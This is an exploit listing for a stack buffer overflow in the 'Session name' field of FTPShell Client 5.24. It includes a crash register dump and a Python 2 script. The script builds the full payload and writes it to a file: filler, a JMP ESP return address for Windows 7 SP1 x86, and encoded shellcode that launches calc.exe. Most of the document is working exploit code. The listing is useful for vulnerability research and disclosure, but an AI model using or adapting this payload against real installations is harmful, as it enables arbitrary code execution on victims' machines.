# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Google Dork: N/A
# Date: 2015-01-04
# Exploit Author: INSECT.B
# Twitter : @INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# Blog : http://binsect00.tistory.com
# Vendor Homepage: www.ftpshell.com
# Software Link: http://www.ftpshell.com/download.htm
# Version: 5.24
# Tested on: Windows7 Ultimate SP1 K x86
# CVE : N/A
"""
[+] Type : Buffer Overflow
[-] FTPShell client has a buffer overflow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field
[-] used to add session to favorites list .

[+]Crash : input 'A' x 1500 to Session name field
[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
[-] cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
[-] 41414141 ?? ???

Proof-of-concept generator: this script does not talk to FTPShell itself; it
only writes the crafted 'Session name' payload to a file on disk.  The register
dump above (eip and ebp both 0x41414141) is the crash signature an analyst would
see in a debugger or crash report; the root cause is a missing length check on
the Session name field in the client.
"""

# Python 2 assumed: string literals below are byte strings and `file` is a
# Python 2 builtin that this script shadows.
import struct  # imported but never used below

# Filler that precedes the saved return address.  The layout below places the
# address overwrite at offset 460 (ebp/eip read 0x41414141 in the dump above).
junk = "A"*460
# 248 NOP bytes appended after the shellcode as trailing padding.
junk2 = "\x90"*248
# Little-endian 0x73DFD40B.  The listing does not say which module this
# JMP ESP address belongs to; it is specific to the tested Win7 SP1 x86 build.
esp = "\x0B\xD4\xDF\x73" # JMP ESP

#shellcode
#CMD : calc.exe
#encoder : Alpha-mix encoder
#buffer register : esp
sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
"\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
"\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
"\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
"\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
"\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
"\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
"\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
"\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
"\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
"\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
"\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
"\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
"\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
"\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
"\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
"\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
"\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
"\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
"\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
"\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
"\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
"\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
"\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
"\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
"\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
"\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
"\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
"\x73\x55\x75\x50\x41\x41" )

# Final layout: filler, return-address overwrite, shellcode, trailing padding.
payload = junk + esp + sc + junk2

# Written in text mode ("w"), not binary, and without a `with` block; the
# output path is hard-coded.
file=open("C:\\shelll","w")
file.write(payload)
file.close()